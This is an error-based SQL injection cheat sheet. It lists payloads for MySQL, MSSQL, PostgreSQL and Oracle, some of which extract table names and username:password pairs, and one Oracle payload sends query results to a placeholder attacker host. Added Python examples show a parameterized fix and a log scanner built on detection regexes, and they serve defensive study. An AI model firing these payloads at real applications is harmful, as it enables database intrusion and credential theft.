Overview

Error-based SQL injection extracts data by making the database raise an error whose message embeds the result of an attacker-chosen subquery. It requires verbose database error messages to be displayed on the page (or otherwise returned in the response).
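As an added example (not from this page), the following Python shows the two preconditions the overview names, a value concatenated into the SQL text and the raw engine error returned to the client, beside the hardened form that parameterizes the query, logs the detail server-side and returns only a generic message. It uses an in-memory SQLite database as a stand-in for the engines above; the table, rows, function names and the payload constant (copied from the MySQL ExtractValue section) are constructed for illustration.

```python
import logging
import sqlite3

log = logging.getLogger("shop")

# Constructed test input: the first MySQL ExtractValue payload from this cheat sheet.
PAYLOAD = "' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- -"


def setup_db():
    """Build a throwaway in-memory SQLite database (constructed test data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.test"), ("bob", "bob@example.test")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Both preconditions for error-based SQLi are present: the value is
    concatenated into the SQL text, and the raw database error (with the
    query) is handed back to the caller, i.e. into the HTTP response."""
    sql = f"SELECT email FROM users WHERE username = '{username}'"
    try:
        row = conn.execute(sql).fetchone()
        return {"ok": True, "email": row[0] if row else None}
    except sqlite3.Error as exc:
        # Verbose error reaches the client: this is the leak channel.
        return {"ok": False, "error": f"Database error: {exc} (query: {sql})"}


def lookup_hardened(conn, username):
    """Parameterized query: the input can never change the SQL structure, so
    extractvalue()/CONVERT() tricks are just a literal string to search for.
    Errors are logged server-side and only a generic message is returned."""
    sql = "SELECT email FROM users WHERE username = ?"
    try:
        row = conn.execute(sql, (username,)).fetchone()
        return {"ok": True, "email": row[0] if row else None}
    except sqlite3.Error:
        log.exception("database error in user lookup")  # detail stays in server logs
        return {"ok": False, "error": "An internal error occurred."}


if __name__ == "__main__":
    conn = setup_db()
    print(lookup_vulnerable(conn, PAYLOAD))  # raw engine error, query text echoed back
    print(lookup_hardened(conn, PAYLOAD))    # {'ok': True, 'email': None}
```

The hardened version removes both preconditions at once: with placeholders the payload is compared as data and simply matches no row, and even a genuine database fault never exposes the engine's error text to the client.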

MySQL

ExtractValue

' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- -
' AND extractvalue(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e))-- -
' AND extractvalue(1,concat(0x7e,(SELECT group_concat(username,0x3a,password) FROM users),0x7e))-- -

UpdateXML

' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- -
' AND updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e),1)-- -

Double Query (Subquery)

' AND (SELECT 1 FROM (SELECT count(*),concat((SELECT database()),0x3a,floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -

Geometry Functions

' AND ST_LatFromGeoHash(concat(0x7e,(SELECT database())))-- -
' AND ST_LongFromGeoHash(concat(0x7e,(SELECT database())))-- -

MSSQL

CONVERT / CAST

' AND 1=CONVERT(int,(SELECT db_name()))-- -
' AND 1=CONVERT(int,(SELECT top 1 name FROM sysobjects WHERE xtype='U'))-- -
' AND 1=CONVERT(int,(SELECT top 1 username FROM users))-- -
' AND 1=CAST((SELECT db_name()) AS int)-- -

Having + Group By

' HAVING 1=1-- -
' GROUP BY column HAVING 1=1-- -

Reveals column names in the error message.

PostgreSQL

CAST Error

' AND 1=CAST((SELECT current_database()) AS int)-- -
' AND 1=CAST((SELECT string_agg(table_name,',') FROM information_schema.tables WHERE table_schema='public') AS int)-- -
' AND 1=CAST((SELECT username||':'||password FROM users LIMIT 1) AS int)-- -

Oracle

UTL_INADDR

' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual))-- -

CTXSYS.DRITHSX.SN

' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))-- -

XMLType

' AND extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % x SYSTEM "http://'||(SELECT user FROM dual)||'.ATTACKER/">%x;]>'),'/l')-- -

Truncation

Error messages often truncate long output, so extract it in fixed-size pieces with SUBSTR:
' AND extractvalue(1,concat(0x7e,SUBSTR((SELECT group_concat(username,0x3a,password) FROM users),1,30),0x7e))-- -
' AND extractvalue(1,concat(0x7e,SUBSTR((SELECT group_concat(username,0x3a,password) FROM users),31,30),0x7e))-- -

Quick Reference

Database     Technique
MySQL        extractvalue(1,concat(0x7e,(QUERY)))
MySQL        updatexml(1,concat(0x7e,(QUERY)),1)
MSSQL        CONVERT(int,(QUERY))
PostgreSQL   CAST((QUERY) AS int)
Oracle       UTL_INADDR.GET_HOST_ADDRESS((QUERY))
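The function names in the quick reference double as detection signatures. The Python below is an added example (not from this page): it URL-decodes the request target of each access-log line and flags the error-based function families listed above, plus the MySQL double-query and MSSQL HAVING tricks from the earlier sections. The log excerpt, the regexes and the label names are constructed for illustration and will need tuning against real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log excerpt (Common Log Format style). Lines 2-4 carry
# payloads from this cheat sheet; line 5 contains "broadcast" to check that
# the CAST signature does not fire on ordinary words.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /item?id=42 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /item?id=42%27+AND+extractvalue(1%2Cconcat(0x7e%2C(SELECT+database())%2C0x7e))--+- HTTP/1.1" 500 233
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /item?id=42%27+AND+1%3DCONVERT(int%2C(SELECT+db_name()))--+- HTTP/1.1" 500 198
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /item?id=42%27+AND+1%3DCAST((SELECT+current_database())+AS+int)--+- HTTP/1.1" 500 201
10.0.0.7 - - [01/Jan/2024:12:00:04 +0000] "GET /search?q=broadcast+schedule HTTP/1.1" 200 1024
"""

# One regex per technique family. Case-insensitive because SQL keywords are.
SIGNATURES = [
    ("MySQL extractvalue/updatexml", re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I)),
    ("MySQL geohash", re.compile(r"\bst_(?:lat|long)fromgeohash\s*\(", re.I)),
    ("MySQL double query", re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("MSSQL CONVERT", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("MSSQL/PostgreSQL CAST", re.compile(r"\bcast\s*\(.*\bas\s+int\s*\)", re.I)),
    ("MSSQL HAVING", re.compile(r"\bhaving\s+1\s*=\s*1", re.I)),
    ("Oracle", re.compile(r"\b(?:utl_inaddr\.get_host_address|ctxsys\.drithsx\.sn|xmltype)\s*\(", re.I)),
]

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE) (\S+) HTTP/')


def scan_log(text):
    """Return (line_no, client_ip, status, label) for each line whose decoded
    request target matches a signature. Decoding first matters: the payloads
    arrive percent-encoded, so matching the raw line would miss them."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = unquote_plus(m.group(1))
        client_ip = line.split(" ", 1)[0]
        status = line.rsplit(" ", 2)[-2]  # field just before the byte count
        for label, pattern in SIGNATURES:
            if pattern.search(target):
                hits.append((line_no, client_ip, status, label))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

In practice the HTTP status is the second half of the signal: a request that matches one of these patterns and also draws a 5xx response is exactly the condition the overview describes, so grouping hits by client and status surfaces an active probe quickly. Only the request side can be detected this way; the fix that matters is on the response side, never echoing engine errors to the client.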